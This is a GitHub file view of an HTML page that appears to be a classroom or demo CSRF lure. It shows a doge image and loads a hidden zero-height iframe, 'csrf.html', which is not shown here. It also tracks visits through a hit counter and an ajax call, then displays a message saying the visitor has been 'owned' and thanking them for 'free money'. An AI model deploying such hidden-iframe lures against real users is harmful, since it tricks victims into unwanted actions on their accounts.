-
Notifications
You must be signed in to change notification settings - Fork 0
/
index.html~
49 lines (36 loc) · 1.19 KB
/
index.html~
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<!DOCTYPE html>
<html><head>
<script src="//ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script>
</script>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Create Claimant</title>
<style>
.error-message {
color: red
}
</style>
</head>
<body>
<img src="doge.jpg" alt="doge" height:"400" />
<iframe src="csrf.html" width="400" height="0" style="border-style:none;" id="ifr"></iframe>
<div style="height:0px">
<!-- begin hit counter code --><div><a href="http://hit-counter.info"><img style="border: 0px solid ; display: inline;" alt="tumblr hit counter"
src="http://hit-counter.info/hit.php?id=828958&counter=37"></a><br /><a href="http://hit-counter.info">hit counter</a></div><!-- end hit counter code --></div>
<script>
function sleep(millis, callback) {
setTimeout(function()
{ callback(); }
, millis);
}
$(function(){
$.ajax({
url: "http://seemamenon.github.io/hit.html",
cache: false
});
sleep(5000, function(){
alert("You have just been owned by Seema and Max\n\nThanks for the free money!!");
})
});
</script>
</body></html>